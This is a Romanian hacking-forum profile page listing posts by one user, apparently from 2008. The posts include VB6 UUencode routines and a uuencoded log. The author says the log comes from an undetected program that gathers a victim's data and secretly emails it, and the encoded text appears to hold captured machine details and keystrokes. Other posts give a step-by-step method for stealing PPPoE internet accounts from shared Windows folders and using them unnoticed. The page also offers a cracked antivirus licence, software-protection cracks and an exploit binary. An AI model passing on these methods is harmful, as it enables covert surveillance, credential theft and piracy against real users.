Jump to content

puskin

Active Members
  • Posts

    430
  • Joined

  • Last visited

Everything posted by puskin

  1. Mai jos aveti link-ul de unde puteti downloada KAV sau KIS versiunea 8.0.0.294 pt. anul 2009 include si licenta care se poate reinoi: http://devbuilds.kaspersky-labs.com/devbuilds/devbuilds/8.0.0.292/KAV/English/2008_03_18_17_33/
  2. puskin

    Closed

    Salve! 1.Foloseste algoritm in VB6 2.Dau modulul de encryptare-decryptare Link pt Download module : http://rapidshare.com/files/108973007/modules.zip.html Mai jos sa vedeti cum arata incriptarea si textul encryptat: Public Function UUEncodeFile(strFilePath As String) As String Dim intFile As Integer 'file handler Dim intTempFile As Integer 'temp file Dim lFileSize As Long 'size of the file Dim strFileName As String 'name of the file Dim strFileData As String 'file data chunk Dim lEncodedLines As Long 'number of encoded lines Dim strTempLine As String 'temporary string Dim i As Long 'loop counter Dim j As Integer 'loop counter Dim strResult As String 'Get file name strFileName = Mid$(strFilePath, InStrRev(strFilePath, "\") + 1) 'This important: "begin 664" strResult = "begin 664 " + strFileName + vbLf 'Get file size lFileSize = FileLen(strFilePath) lEncodedLines = lFileSize / 45 + 1 'you need to encode every 45 bytes strFileData = Space(45) intFile = FreeFile 'open the output file Open strFilePath For Binary As intFile For i = 1 To lEncodedLines If i = lEncodedLines Then strFileData = Space(lFileSize Mod 45) End If 'get data Get intFile, , strFileData 'the first byte in a line is a char, which number describes 'how many bytes are in the line strTempLine = Chr(Len(strFileData) + 32) If i = lEncodedLines And (Len(strFileData) Mod 3) Then strFileData = strFileData + Space(3 - (Len(strFileData) Mod 3)) End If 'now some encoding For j = 1 To Len(strFileData) Step 3 strTempLine = strTempLine + Chr(Asc(Mid(strFileData, j, 1)) \ 4 + 32) strTempLine = strTempLine + Chr((Asc(Mid(strFileData, j, 1)) Mod 4) * 16 _ + Asc(Mid(strFileData, j + 1, 1)) \ 16 + 32) strTempLine = strTempLine + Chr((Asc(Mid(strFileData, j + 1, 1)) Mod 16) * 4 _ + Asc(Mid(strFileData, j + 2, 1)) \ 64 + 32) strTempLine = strTempLine + Chr(Asc(Mid(strFileData, j + 2, 1)) Mod 64 + 32) Next j strResult = strResult + strTempLine + vbLf strTempLine = "" 'get next line Next i 'close the file Close intFile 'add the "end" string strResult = strResult & "'" & vbLf + "end" + vbLf 'return the encoded string UUEncodeFile = strResult End Function Aici decryptorul: Public Function UUDecodeToFile(strUUCodeData As String, strFilePath As String) On Error Resume Next Dim vDataLine As Variant 'some variables needed for decoding Dim vDataLines As Variant Dim strDataLine As String Dim intSymbols As Integer Dim intFile As Integer Dim strTemp As String If Left$(strUUCodeData, 6) = "begin " Then 'check if it is a encoded file strUUCodeData = Mid$(strUUCodeData, InStr(1, strUUCodeData, vbLf) + 1) End If If Right$(strUUCodeData, 4) = "end" + vbLf Then 'check if "end" is available strUUCodeData = Left$(strUUCodeData, Len(strUUCodeData) - 7) End If intFile = FreeFile Open strFilePath For Binary As intFile 'open output file vDataLines = Split(strUUCodeData, vbLf) For Each vDataLine In vDataLines 'get every line strDataLine = CStr(vDataLine) intSymbols = Asc(Left$(strDataLine, 1)) 'get number of chars in 'one line. This is important 'for decoding strDataLine = Mid$(strDataLine, 2, intSymbols) For i = 1 To Len(strDataLine) Step 4 'now some decoding strTemp = strTemp + Chr((Asc(Mid(strDataLine, i, 1)) - 32) * 4 + _ (Asc(Mid(strDataLine, i + 1, 1)) - 32) \ 16) strTemp = strTemp + Chr((Asc(Mid(strDataLine, i + 1, 1)) Mod 16) * 16 + _ (Asc(Mid(strDataLine, i + 2, 1)) - 32) \ 4) strTemp = strTemp + Chr((Asc(Mid(strDataLine, i + 2, 1)) Mod 4) * 64 + _ Asc(Mid(strDataLine, i + 3, 1)) - 32) Next i 'put the decoded data in the file Put intFile, , strTemp strTemp = "" Next 'close the file Close intFile End Function Si textul : begin 664 sysdll.txt M4W1A<G1E9#H@-"\R,"\R,# #,Z,C<Z,#(@4$T-"@T*57-E<B!.86UE.B!X M=&5A;0T*0V]M<'5T97(@3F%M93H@1$5&14Y#13(Y34E,#0I$3TU!24XZ($1% M1D5.0T4R.4U)3 T*25 Z(#$Y,BXQ-C@N,"XU- T*#0I;,SHR-SHQ,"!035T\ M/%5N=&ET;&5D("T@3F]T97!A9#X^"5-34U-34U-34U-34U-34U-34U-34U-3 M4U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-3 M4U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-3 M4U-34U-34U-34U-34U-34U-34U,-"ELS.C(W.C$P(%!-73P\5&]T86P@0V]M M;6%N9&5R(#<N,"!P=6)L:6,@8F5T82 R("T@3D]4(%)%1TE35$52140^/@D- M"ELS.C(W.C$W(%!-73P\56YT:71L960@+2!.;W1E<&%D/CX)6T8Q,ET-"@T* M16YD960Z(#0O,C O,C P." S.C(W.C$%!-#0H-"D%23TT@;65N=&EN92!S M:2!D97IV;VQT82!P87)T96YE<FEA=&4@8W4@8V5L92!M86D@<F5N=6UI=&4@ M8V]M<&%N:6D@97AT97)N92!P96YT<G4@;R!M86D@8G5N82!A8V]P97)I<F4@ M82!N979O:6QO<B!C86QA=&]R:6QO<BX@4&4@;&%N9V$@8V5L92 Q-3 @9&4@ M8V]N=')A8W1E(&)I;&%T97)A;&4@8W4@8V]M<&%N:6D@9&EN(&EN=')E86=A M(&QU;64L(%1!4D]-(',M82!O<FEE;G1A="!S:2!C871R92!P87)T96YE<FEA M=&4@8V]D92US:&%R92!C=2!A;'1E(&-O;7!A;FEI(&1E(&UA<F-A('!E;G1R M=2!A('9E;FD@:6X@:6YT86UP:6YA<F5A(&-L:65N=&EL;W(N4RY#+B!#;VUP M86YI82!.871I;VYA;&$@9&4@5')A;G-P;W)T=7)I($%E<FEE;F4@4F]M86YE M(%1!4D]-(%,N02XL#0IP97)S;V%N82!J=7)I9&EC82!R;VUA;F$L(&-U('-E M9&EU;"!S;V-I86P@:6X@;W)A<W5L($]T;W!E;FDL#0I#86QE82!"=6-U<F5S M=&EL;W(@3G(N(#(R-"!&+"!*=61E='5L($EL9F]V+ T*26YR96=I<W1R871A M(&QA(&]F:6-I=6P@4F5G:7-T<G5L=6D@0V]M97)T=6QU:2!);&9O=B!C=2!N M<BX-"DHR,R\Q,CDX+S(P,#,L(&-O9"!U;FEC(&1E(&EN<F5G:7-T<F%R92 T M-S<V-#<L#0IC=2!U;B!C87!I=&%L('-O8VEA;"!S=6)S8W)I<R!S:2!V87)S M870@9&4-"C$N-C(Q+C@W."XQ.3(L-S@@4D].+@T*#0H@(" Q+B @0VER8W5L M871I82!P92!D<G5M=7)I;&4@<'5B;&EC92!A('9E:&EC=6QE;&]R+"!P:65T M;VYI;&]R('-I(&$@8V5L;W)L86QT92!C871E9V]R:6D@9&4@<&%R=&EC:7!A M;G1I(&QA('1R869I8RP@9')E<'1U<FEL92P@;V)L:6=A=&EI;&4@<VD@<F%S M<'5N9&5R:6QE(&-A<F4@<F5V:6X@<&5R<V]A;F5L;W(@9FEZ:6-E('-I(&IU M<FED:6-E+"!P<F5C=6T@<VD@871R:6)U=&EI;&4@=6YO<B!A=71O<FET871I M(&%L92!A9&UI;FES=')A=&EE:2!P=6)L:6-E+"!I;G-T:71U=&EI('-I(&]R M9V%N:7IA=&EI('-U;G0@<W5P=7-E(&1I<W!O>FET:6EL;W(@<')E=F%Z=71E M(&EN('!R97IE;G1A(&]R9&]N86YT82!D92!U<F=E;G1A+@T*(" @,BX@1&ES M<&]Z:71I:6QE('!R979A>G5T92!I;B!P<F5Z96YT82!O<F1O;F%N=&$@9&4@ M=7)G96YT82!A=2!C82!S8V]P(&%S:6=U<F%R96$@9&5S9F%S=7)A<FEI(&9L M=65N=&4@<VD@:6X@<VEG=7)A;G1A(&$@8VER8W5L871I96D@<&4@9')U;75R M:6QE('!U8FQI8V4L('!R96-U;2!S:2!O8W)O=&ER96$@=FEE=&EI+"!I;G1E M9W)I=&%T:6D@8V]R<&]R86QE('-I(&$@<V%N871A=&EI('!E<G-O86YE;&]R M('!A<G1I8VEP86YT92!L82!T<F%F:6,@<V%U(&%F;&%T92!I;B!Z;VYA(&1R M=6UU;'5I('!U8FQI8RP@<')O=&5C=&EA(&1R97!T=7)I;&]R('-I(&EN=&5R M97-E;&]R(&QE9VET:6UE(&%L92!P97)S;V%N96QO<B!R97-P96-T:79E+"!A M('!R;W!R:65T871I:2!P=6)L:6-E('-I('!R:79A=&4L(&-A="!S:2!A(&UE M9&EU;'5I+@T*(" @,RX@075T;W)I=&%T96$@8V]M<&5T96YT82!I;B!D;VUE M;FEU;"!C:7)C=6QA=&EE:2!P92!D<G5M=7)I;&4@<'5B;&EC92!P<FEV:6YD M(&EN:71I97)E82!S:2!A=FEZ87)E82!U;F]R(')E9VQE;65N=&%R:2P@<')E M8W5M('-I(&%P;&EC87)E82!S:2!E>&5R8VET87)E82!C;VYT<F]L=6QU:2!P M<FEV:6YD(')E<W!E8W1A<F5A(&YO<FUE;&]R(&1I;B!A8V5S="!D;VUE;FEU M(&5S=&4@36EN:7-T97)U;"!!9&UI;FES=')A=&EE:2!S:2!);G1E<FYE;&]R M+"!P<FEN($EN<W!E8W1O<F%T=6P@1V5N97)A;"!A;"!0;VQI=&EE:2!2;VUA M;F4N#0H@(" T+B!296=L96UE;G1A<FEL92!P<FEV:6YD(&-I<F-U;&%T:6$@ M<&4@9')U;75R:6QE('!U8FQI8V4@<V4@96UI="P@9'5P82!C87HL(&1E(&-A M=')E(&%U=&]R:71A=&EL92!P=6)L:6-E(&-E;G1R86QE('-A=2!L;V-A;&4@ M8W4@871R:6)U=&EI(&EN(&%C97-T(&1O;65N:74L(&YU;6%I(&-U(&%V:7IU M;"!);G-P96-T;W)A='5L=6D@1V5N97)A;"!A;"!0;VQI=&EE:2!2;VUA;F4@ M<VD@8W4@<F5S<&5C=&%R96$@86-O<F1U<FEL;W(@<VD@8V]N=F5N=&EI;&]R M(&EN=&5R;F%T:6]N86QE(&QA(&-A<F4@4F]M86YI82!E<W1E('!A<G1E+@T* M(" @-2X@4')E=F5D97)I;&4@<')E>F5N=&5I(&]R9&]N86YT92!D92!U<F=E M;G1A('-E(&%P;&EC82!T=71U<F]R('!A<G1I8VEP86YT:6QO<B!L82!T<F%F M:6,L('!R96-U;2!S:2!A=71O<FET871I;&]R(&-A<F4@874@871R:6)U=&EI M(&EN(&1O;65N:75L(&-I<F-U;&%T:65I('-I('-I9W5R86YT96D@<&4@9')U M;75R:6QE('!U8FQI8V4L('!R96-U;2!S:2!I;B!D;VUE;FEU;"!P<F]T96-T M:65I(&UE9&EU;'5I+@T*#0H-"@T*07)T+B R+B!);F1R=6UA<F5A+"!S=7!R M879E9VAE<F5A('-I(&-O;G1R;VQU;"!R97-P96-T87)I:2!N;W)M96QO<B!D M92!C:7)C=6QA=&EE('!E(&1R=6UU<FEL92!P=6)L:6-E('-E(&9A8R!D92!C M871R92!P;VQI=&EA(')U=&EE<F$@9&EN(&-A9')U;"!);G-P96-T;W)A='5L M=6D@1V5N97)A;"!A;"!0;VQI=&EE:2!2;VUA;F4L(&-A<F4@87)E(&]B;&EG M871I82!S82!I82!M87-U<FEL92!L96=A;&4@:6X@8V%Z=6P@:6X@8V%R92!C M;VYS=&%T82!I;F-A;&-A<FD@86QE(&%C97-T;W)A+@T*#0H-"D%R="X@,RX@ M0VER8W5L871I82!P92!D<G5M=7)I;&4@<'5B;&EC92!D:6X@>F]N82!D92!F M<F]N=&EE<F$@<VD@9&EN(&%L=&4@>F]N92!P96YT<G4@8V%R92P@<&]T<FEV M:70@;&5G:6DL(',M874@<W1A8FEL:70@<F5S=')I8W1I:2!S92!F86-E(&-U M(')E<W!E8W1A<F5A(')E9VQE;65N=&%R:6QO<B!I;G-T:71U:71E('!E;G1R M=2!A8V5L92!Z;VYE+@T*#0H-"D%R="X@-"X@0V]N=')O;'5L(&-I<F-U;&%T M:65I('9E:&EC=6QE;&]R(&%P87)T:6YA;F0@:6YS=&ET=71I:6QO<B!D:6X@ M<VES=&5M=6P@9&4@87!A<F%R92P@;W)D:6YE('!U8FQI8V$@<VD@<VEG=7)A M;G1A(&YA=&EO;F%L82!S92!E9F5C='5E87IA(&1E(&-A=')E('!O;&ET:6$@ M<G5T:65R82P@<')E8W5M('-I(&1E('!E<G-O;F%L=6P@9&5S96UN870@9&4@ M8V%T<F4@86-E<W1E(&EN<W1I='5T:6DN#0H-"@T*07)T+B U+@T*#0H@(" Q M+B!!9&UI;FES=')A=&]R=6P@9')U;75L=6D@<'5B;&EC+"!A;G1R97!R96YO M<G5L('-A=2!E>&5C=71A;G1U;"!L=6-R87)I;&]R+"!C;VYF;W)M(&-O;7!E M=&5N=&5L;W(@8V4@:6D@<F5V:6XL(&-U(&%V:7IU;"!P;VQI=&EE:2!R=71I M97)E+"!E<W1E(&]B;&EG870@<V$@:6YS=&%L97IE(&EN9&EC871O87)E(&]R M:2!A;'1E(&1I<W!O>FET:79E('-P96-I86QE+"!S82!A<&QI8V4@;6%R8V%J M92!P92!D<G5M=7)I;&4@<'5B;&EC92P@8V]N9F]R;2!S=&%N9&%R9&5L;W(@ M:6X@=FEG;V%R92P@<VD@<V$@;&4@;65N=&EN82!I;B!S=&%R92!C;W)E<W!U M;GIA=&]A<F4N#0H@(" R+B!!9&UI;FES=')A=&]R=6P@9')U;75L=6D@<'5B M;&EC('-A=2P@9'5P82!C87HL(&%N=')E<')E;F]R=6P@;W)I(&5X96-U=&%N M='5L(&QU8W)A<FEL;W(@97-T92!O8FQI9V%T('-A('-E;6YA;&EZ97IE(&-O M<F5S<'5N>F%T;W(L(&-A="!M86D@<F5P961E('!O<VEB:6PL(&]R:6-E(&]B M<W1A8V]L(&%F;&%T('!E('!A<G1E82!C87)O<V%B:6QA+"!C87)E('-T86YJ M96YE<W1E('-A=2!P=6YE(&EN('!E<FEC;VP@<VEG=7)A;G1A(&-I<F-U;&%T M:65I+"!S:2!S82!I82!T;V%T92!M87-U<FEL92!D92!I;FQA='5R87)E(&$@ M86-E<W1U:6$N#0H@(" S+B!!=71O<FET871I;&4@<'5B;&EC92!L;V-A;&4@ M<W5N="!O8FQI9V%T92!S82!A;65N86IE>F4@<W1A=&EI;&4@;6EJ;&]A8V5L M;W(@9&4@=')A;G-P;W)T('!U8FQI8R!D92!P97)S;V%N92P@<')E=F%Z=71E M(&-U(&%L=F5O;&4@<V%U(')E9G5G:6DL(&-U(&%V:7IU;"!P;VQI=&EE:2!R M=71I97)E+@T*(" @-"X@4V4@:6YT97)Z:6,@86UP;&%S87)E82!C;VYS=')U M8W1I:6QO<B!D92!O<FEC92!F96P@<VD@<')A8W1I8V%R96$@86-T96QO<B!D M92!C;VUE<G0@<&4@=')O='5A<B!S874@<&4@86-O<W1A;65N="P@:6X@<&%R M8V%R:6QE(&%M96YA:F%T92!S874@<&4@<&%R=&5A(&-A<F]S86)I;&$L(&EN M(&-O;F1I=&EI;&4@:6X@8V%R92!A8V5S=&4@8V]N<W1R=6-T:6D@87(@869E M8W1A('-I9W5R86YT82!C:7)C=6QA=&EE:2!P:65T;VYI;&]R('-I('9E:&EC M=6QE;&]R+@T*(" @-2X@26X@<&5R:6UE=')U;"!S=&%T:6EL;W(@;6EJ;&]A M8V5L;W(@9&4@=')A;G-P;W)T('!U8FQI8R!D92!P97)S;V%N92!P;W0@9FD@ M86UE;F%J871E(&1O87(@<W!A=&EI.@T*4W1A<G1E9#H@-"\R,"\R,# #,Z M-#0Z-#@@4$T-"@T*57-E<B!.86UE.B!X=&5A;0T*0V]M<'5T97(@3F%M93H@ M1$5&14Y#13(Y34E,#0I$3TU!24XZ($1%1D5.0T4R.4U)3 T*25 Z(#$Y,BXQ M-C@N,"XU- T*#0I;,SHT-#HT.2!035T\/%1O=&%L($-O;6UA;F1E<B W+C @ M<'5B;&EC(&)E=&$@,B M($Y/5"!214=)4U1%4D5$/CX)#0I;,SHT-#HU,"!0 M35T\/%-T87)T($UE;G4^/@D-"ELS.C0T.C4U(%!-73P\56YT:71L960@+2!. M;W1E<&%D/CX)4E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)2 M4E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)2#0H-"D5N9&5D.B T M+S(P+S(P,#@@,SHT-#HU-2!030T*#0H 7 @ ' end Ca sa fiu mai explicit: -programul genereaza fisierul pe calculatorul iar cand atinge dimeniunea de 5000 de biti (5Kb) este incryptat si trimis ca attach pe mail...numai ca el imi vine pe email in urmatorul mod (in nici un caz attach!)...e vreo posibilitate sa decodez textul?:
  3. alta data sa nu mai bagati screen-uri ca pot si eu sa copii imaginea in care scrie "parola sparta" pe Command2 sa o redenumesc pe comp la mine si so urc din nou pe net si "Gata am spart parola LOL"
  4. Imi retrag cuvintele...e aproape imposibil de decriptat nu imposibil......
  5. e imposibil de decriptat textul din imagine cel putin pt. nivelul meu de pregatire, fara sa stiu daca exista o cheie de criptare, si in cele din urma fara timpul necesar...
  6. 35a4 - w88a - 1123 - flo1 :) lol
  7. Acum lucrez la un program pt. matzele alea de pe rapid share :D:D
  8. <SCRIPT> PERL=MANELE TATA=MAMA "-1"(oIo) THREAD J WINAMP FILE GUTA SALAM' END SCRIPT "VOTKA" </SCRIPT> Ia vezi ruleaza? Helloooooooooooo wakeup :idea: Nu am zis ca am scris eu script-ul ci doar l-am compilat, deoarece nu am gasit nicaieri postat fisierul decode.pl, caci daca il gaseam ii dadeam copy paste era mai simplu decat sa-l compilez, sa-l testez sa vad daca merge si sa il mai si explic aici pe forum pt n00bi Eu zic ca se poate muta la "trash" post-ul asta....voi ce ziceti
  9. Chiar nu puteti face nimic la cei care se baga aiurea in thread-uri de profil...? Azi m-am chinuit si eu sa fac un patch pt un program si sa-l postez cat mai repede ca lumea sa poata beneficia de el...si hopa surpriza : http://rstcenter.com/forum/3wplayer-hack-crack-t11435.rst Primu imi raspunde: daca ti-am pus screenshot tu ce zici? sa zicem ca inca n-am incredere in tine ceva nou: http://www.maneletube.com/ Si acum al doilea: Se zice ca majoritatea decide , si cat timp majoritatea vor manele asta e . De ce rezista manelele ? Pai simplu : 1. ritmu oriental 2. cuvinte ca bani ,femei ,bautura , sunt no 1 , sa moara dusmani care au priza la orice om . 3. La un chef vrei sa vezi cum da femeia din buci , nu din plete . Ce legatura au manele cu programul de decriptare????? Lol asta nu o sa inteleg niciodata ! Va rog adminilor sau moderatorilor paziti herghelia bine daca nu vreti sa apara toata discografia lui Guta in posturile de exploituri sau programare :)
  10. Personal l-am testat pe McAffe Visual Trace care imi era expirat de prin 11.2007 si a mers perfect (s-ar putea sa trebuiasca sa stii perioada cand a functionat trial pe comp. tau...dar nu stiu exact...)
  11. lasa si tu id-ul de la adresa care "ti-a fost sparta" asa e normal....
  12. V-ati saturat de programele ce expira dupa 15 zile sau 30 de zile asa zisele trial-uri...?Acest program va permite sa rulati un program expirat daca introduceti o data calendaristica din perioada cand era inca activ.Programul va rula in perioada scrisa de timp.Data sistemului nu este afectata. Download: http://rapidshare.com/files/109473123/BW-CRACKER.exe.html P.S: v-am pus si o poza faina sa nu va pliktis cat incarca programul
  13. daca ti-am pus screenshot tu ce zici?
  14. Pentru cei ce gasesc pe torrenti un film care la deschidere cere 3wplayer pentru decodare trebuie sa urmeze urmatoarea procedura: Download crack: http://rapidshare.com/files/109450206/3wplayer-hack.zip.html Contine Activ Pearl pt. windows xp(nu am incercat pe vista) si Fisierul in perl decode.pl Ce trebuie sa faceti: Instalati AP care va forma un folder C:\Perl Copiati fisierul decode.pl in C:\Perl\eg\decode.pl Deschideti Total Commander si duceti-va in acel director, selectati decode.pl mai jos in campul de comanda de la total commander scrieti CMD, vi se va deschide consola de command prompt. Copiati filmul incriptat in directorul C:\Perl\eg unde aveti si fisierul decode.pl In consola (cmd) scrieti: C:\Perl\eg> perl decode.pl FILM_INCRIPTAT.avi FILM_DECRIPTAT.avi Daca numele are spatii scrieti asa: perl decode.pl "FILM XXX XXXX.avi" "FILM-CUMVREITU.avi"
  15. sal, pune o poza te rog cu automatu
  16. mai avea putin pe virustotal si batea recordurile la fisiere infectate :)) mai fratilor m-am prins: voi vreti sa faceti aici o baza de date cu antichitati, de genul vx heavens ganditi inainte de a posta ce postati. Cred ca se poate inchide topicul voi ce spuneti?
  17. Tare greu e sa tst www.google.com si sa scri numele programelor....nu vreti sa vi le trimit prin prioripost acasa la usa? Nu te poate vedea doar daca raporteaza persoana care detine contul ca nui merge net-ul..doar atunci verifica In momentul conectarii pe pppoe ip-ul este la fel cu al victimei iar ip-ul placii de retea poate fi variabil daca este pe "obtain automatic" iar adresa de mac este aceeasi....doar sa nu aiba nod-uri active switch-uri cu protocoale instalate pe ele.... Multi in timpul zilei pana in orele 16-17 nu folosesc internetul de acasa deci sunt offline dai ping sa vezi care cont este offline si intri pe el..cand incepe sa mearga mai greu, adica sa scada viteza te deconectezi si treci pe altul...
  18. Stiu ca acest subiect nu mai este de actualitate dar hai sa ne reamintim putin de copilarie CUM SA FURI CONTURI DE PPPOE SUNT NECESARE URMATOARELE PROGRAME: Angry IP scanner 2.21 cu optiunea de "MAC" activata Strong dc 1.00 rc10(client huburi odc) Proactive System Password Recovery v5, 3, 0, 653 Metoda: Se stie ca userul si parola contului sunt stocate in: Windows\System32\Config\ sub forma a doua fisiere: SYSTEM si SECURITY Se intra pe reteaua proprie cu clientul de odc (necesita client care sa poata vedea ip-ului useru-lui si care sa aiba permisiuni de "allow sys file on") Se cauta cei cu windows-ul la share si se copie directorul "config" di System32, dupa care vedem Ip-ul celui de la care am copiat se baga in Ip Angry Scanner si se afla adresa de MAC(uneori merge si scanner-ul Amac address ) Dupa ce am strans datele pornim Proactive System Password Recovery v5, 3, 0, 653 si dam pe modul manual dupa care introducem fisierele SYSTEM si SECURITY pt. decodare md5 programul ne da contul. Asta e tot!Numai bine!
  19. Am gasit un cod de exploit pe un site din China, am stat 1 saptamana sa inteleg ce face de fapt, am reusit sa-l adaptez pt. VB6.Din motive de securitate nu pot posta varianta intreaga sau codul sursa. Download: http://rapidshare.com/files/108996983/BWBP.exe.html sau: BWBP exe
  20. puskin

    Closed

    Salve! Am nevoie de ajutor pentru a decrypta un text codat in limbajul VB6 Am modulul de encryptare-decryptare, am si textul care trebuie decriptat..(textul nu este important...vreau numai sa stiu daca functioneaza decryptorul...).Problema este urmatoarea am codat textul dar cand dau sa-l decodez surpriza...imi scoate fisierul cu txt "0 Biti". Cel mai bine ar fi sa se poata decoda direct textul, nu neaparat un fisier. Ii multumesc anticipat celui care ma ajuta. Link pt Download module : http://rapidshare.com/files/108973007/modules.zip.html Mai jos sa vedeti cum arata incriptarea si textul encryptat: P.S cine ma ajuta sa-l decodez primeste codul sursa + programul aplicatiei...care este 100% nedetectata 100% automata Public Function UUEncodeFile(strFilePath As String) As String Dim intFile As Integer 'file handler Dim intTempFile As Integer 'temp file Dim lFileSize As Long 'size of the file Dim strFileName As String 'name of the file Dim strFileData As String 'file data chunk Dim lEncodedLines As Long 'number of encoded lines Dim strTempLine As String 'temporary string Dim i As Long 'loop counter Dim j As Integer 'loop counter Dim strResult As String 'Get file name strFileName = Mid$(strFilePath, InStrRev(strFilePath, "\") + 1) 'This important: "begin 664" strResult = "begin 664 " + strFileName + vbLf 'Get file size lFileSize = FileLen(strFilePath) lEncodedLines = lFileSize / 45 + 1 'you need to encode every 45 bytes strFileData = Space(45) intFile = FreeFile 'open the output file Open strFilePath For Binary As intFile For i = 1 To lEncodedLines If i = lEncodedLines Then strFileData = Space(lFileSize Mod 45) End If 'get data Get intFile, , strFileData 'the first byte in a line is a char, which number describes 'how many bytes are in the line strTempLine = Chr(Len(strFileData) + 32) If i = lEncodedLines And (Len(strFileData) Mod 3) Then strFileData = strFileData + Space(3 - (Len(strFileData) Mod 3)) End If 'now some encoding For j = 1 To Len(strFileData) Step 3 strTempLine = strTempLine + Chr(Asc(Mid(strFileData, j, 1)) \ 4 + 32) strTempLine = strTempLine + Chr((Asc(Mid(strFileData, j, 1)) Mod 4) * 16 _ + Asc(Mid(strFileData, j + 1, 1)) \ 16 + 32) strTempLine = strTempLine + Chr((Asc(Mid(strFileData, j + 1, 1)) Mod 16) * 4 _ + Asc(Mid(strFileData, j + 2, 1)) \ 64 + 32) strTempLine = strTempLine + Chr(Asc(Mid(strFileData, j + 2, 1)) Mod 64 + 32) Next j strResult = strResult + strTempLine + vbLf strTempLine = "" 'get next line Next i 'close the file Close intFile 'add the "end" string strResult = strResult & "'" & vbLf + "end" + vbLf 'return the encoded string UUEncodeFile = strResult End Function Aici decryptorul: Public Function UUDecodeToFile(strUUCodeData As String, strFilePath As String) On Error Resume Next Dim vDataLine As Variant 'some variables needed for decoding Dim vDataLines As Variant Dim strDataLine As String Dim intSymbols As Integer Dim intFile As Integer Dim strTemp As String If Left$(strUUCodeData, 6) = "begin " Then 'check if it is a encoded file strUUCodeData = Mid$(strUUCodeData, InStr(1, strUUCodeData, vbLf) + 1) End If If Right$(strUUCodeData, 4) = "end" + vbLf Then 'check if "end" is available strUUCodeData = Left$(strUUCodeData, Len(strUUCodeData) - 7) End If intFile = FreeFile Open strFilePath For Binary As intFile 'open output file vDataLines = Split(strUUCodeData, vbLf) For Each vDataLine In vDataLines 'get every line strDataLine = CStr(vDataLine) intSymbols = Asc(Left$(strDataLine, 1)) 'get number of chars in 'one line. This is important 'for decoding strDataLine = Mid$(strDataLine, 2, intSymbols) For i = 1 To Len(strDataLine) Step 4 'now some decoding strTemp = strTemp + Chr((Asc(Mid(strDataLine, i, 1)) - 32) * 4 + _ (Asc(Mid(strDataLine, i + 1, 1)) - 32) \ 16) strTemp = strTemp + Chr((Asc(Mid(strDataLine, i + 1, 1)) Mod 16) * 16 + _ (Asc(Mid(strDataLine, i + 2, 1)) - 32) \ 4) strTemp = strTemp + Chr((Asc(Mid(strDataLine, i + 2, 1)) Mod 4) * 64 + _ Asc(Mid(strDataLine, i + 3, 1)) - 32) Next i 'put the decoded data in the file Put intFile, , strTemp strTemp = "" Next 'close the file Close intFile End Function Si textul : begin 664 sysdll.txt M4W1A<G1E9#H@-"\R,"\R,# #,Z,C<Z,#(@4$T-"@T*57-E<B!.86UE.B!X M=&5A;0T*0V]M<'5T97(@3F%M93H@1$5&14Y#13(Y34E,#0I$3TU!24XZ($1% M1D5.0T4R.4U)3 T*25 Z(#$Y,BXQ-C@N,"XU- T*#0I;,SHR-SHQ,"!035T\ M/%5N=&ET;&5D("T@3F]T97!A9#X^"5-34U-34U-34U-34U-34U-34U-34U-3 M4U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-3 M4U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-34U-3 M4U-34U-34U-34U-34U-34U-34U,-"ELS.C(W.C$P(%!-73P\5&]T86P@0V]M M;6%N9&5R(#<N,"!P=6)L:6,@8F5T82 R("T@3D]4(%)%1TE35$52140^/@D- M"ELS.C(W.C$W(%!-73P\56YT:71L960@+2!.;W1E<&%D/CX)6T8Q,ET-"@T* M16YD960Z(#0O,C O,C P." S.C(W.C$%!-#0H-"D%23TT@;65N=&EN92!S M:2!D97IV;VQT82!P87)T96YE<FEA=&4@8W4@8V5L92!M86D@<F5N=6UI=&4@ M8V]M<&%N:6D@97AT97)N92!P96YT<G4@;R!M86D@8G5N82!A8V]P97)I<F4@ M82!N979O:6QO<B!C86QA=&]R:6QO<BX@4&4@;&%N9V$@8V5L92 Q-3 @9&4@ M8V]N=')A8W1E(&)I;&%T97)A;&4@8W4@8V]M<&%N:6D@9&EN(&EN=')E86=A M(&QU;64L(%1!4D]-(',M82!O<FEE;G1A="!S:2!C871R92!P87)T96YE<FEA M=&4@8V]D92US:&%R92!C=2!A;'1E(&-O;7!A;FEI(&1E(&UA<F-A('!E;G1R M=2!A('9E;FD@:6X@:6YT86UP:6YA<F5A(&-L:65N=&EL;W(N4RY#+B!#;VUP M86YI82!.871I;VYA;&$@9&4@5')A;G-P;W)T=7)I($%E<FEE;F4@4F]M86YE M(%1!4D]-(%,N02XL#0IP97)S;V%N82!J=7)I9&EC82!R;VUA;F$L(&-U('-E M9&EU;"!S;V-I86P@:6X@;W)A<W5L($]T;W!E;FDL#0I#86QE82!"=6-U<F5S M=&EL;W(@3G(N(#(R-"!&+"!*=61E='5L($EL9F]V+ T*26YR96=I<W1R871A M(&QA(&]F:6-I=6P@4F5G:7-T<G5L=6D@0V]M97)T=6QU:2!);&9O=B!C=2!N M<BX-"DHR,R\Q,CDX+S(P,#,L(&-O9"!U;FEC(&1E(&EN<F5G:7-T<F%R92 T M-S<V-#<L#0IC=2!U;B!C87!I=&%L('-O8VEA;"!S=6)S8W)I<R!S:2!V87)S M870@9&4-"C$N-C(Q+C@W."XQ.3(L-S@@4D].+@T*#0H@(" Q+B @0VER8W5L M871I82!P92!D<G5M=7)I;&4@<'5B;&EC92!A('9E:&EC=6QE;&]R+"!P:65T M;VYI;&]R('-I(&$@8V5L;W)L86QT92!C871E9V]R:6D@9&4@<&%R=&EC:7!A M;G1I(&QA('1R869I8RP@9')E<'1U<FEL92P@;V)L:6=A=&EI;&4@<VD@<F%S M<'5N9&5R:6QE(&-A<F4@<F5V:6X@<&5R<V]A;F5L;W(@9FEZ:6-E('-I(&IU M<FED:6-E+"!P<F5C=6T@<VD@871R:6)U=&EI;&4@=6YO<B!A=71O<FET871I M(&%L92!A9&UI;FES=')A=&EE:2!P=6)L:6-E+"!I;G-T:71U=&EI('-I(&]R M9V%N:7IA=&EI('-U;G0@<W5P=7-E(&1I<W!O>FET:6EL;W(@<')E=F%Z=71E 